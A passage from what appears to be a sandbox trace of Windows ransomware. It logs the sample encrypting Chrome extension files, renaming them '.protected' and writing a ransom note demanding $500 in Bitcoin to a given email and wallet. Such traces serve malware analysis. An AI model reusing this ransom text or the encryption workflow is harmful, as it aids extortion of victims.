Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".rar") returned 0x0 [0080.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png") returned 175 [0080.897] StrStrW (lpFirst="topbar_floating_button_pressed.png", lpSrch=".zip") returned 0x0 [0080.897] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.898] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.898] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.898] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.899] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.899] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.899] CloseHandle (hObject=0x164) returned 1 [0080.899] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected") returned 185 [0080.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.protected")) returned 1 [0080.900] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.900] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.900] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\RESTORE_FILES.txt") returned 158 [0080.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.900] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.901] lstrlenA (lpString="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") returned 684 [0080.901] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.901] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.901] CloseHandle (hObject=0x160) returned 1 [0080.902] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0080.902] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0080.902] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0080.902] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.902] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0080.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json") returned 147 [0080.902] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0080.902] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x52a, lpOverlapped=0x0) returned 1 [0080.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffad6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x52a, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x52a, lpOverlapped=0x0) returned 1 
[0080.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.904] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.905] CloseHandle (hObject=0x160) returned 1 [0080.905] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected") returned 157 [0080.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.protected")) returned 1 [0080.905] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.905] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0080.905] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0080.906] 
lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0080.906] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0080.906] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0080.906] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned 142 [0080.906] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0080.906] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0080.906] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*") returned 144 [0080.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.914] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.914] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\.") returned 144 [0080.915] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.915] FindNextFileW (in: hFindFile=0x47bbd0, 
lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.915] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\..") returned 145 [0080.915] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.915] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.915] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.915] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.915] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg") returned 145 [0080.915] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.915] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.915] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*") returned 147 [0080.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\.") returned 147 [0080.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\..") returned 148 [0080.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.916] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0080.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.916] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.916] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.916] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.916] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.916] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.918] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json") returned 159 [0080.918] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.918] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x376, lpOverlapped=0x0) returned 1 [0080.925] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffc8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x376, lpOverlapped=0x0) returned 1 [0080.926] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.926] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.926] CloseHandle (hObject=0x168) returned 1 [0080.926] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected") returned 169 [0080.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.927] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.927] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\RESTORE_FILES.txt") returned 163 [0080.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.928] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.928] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 
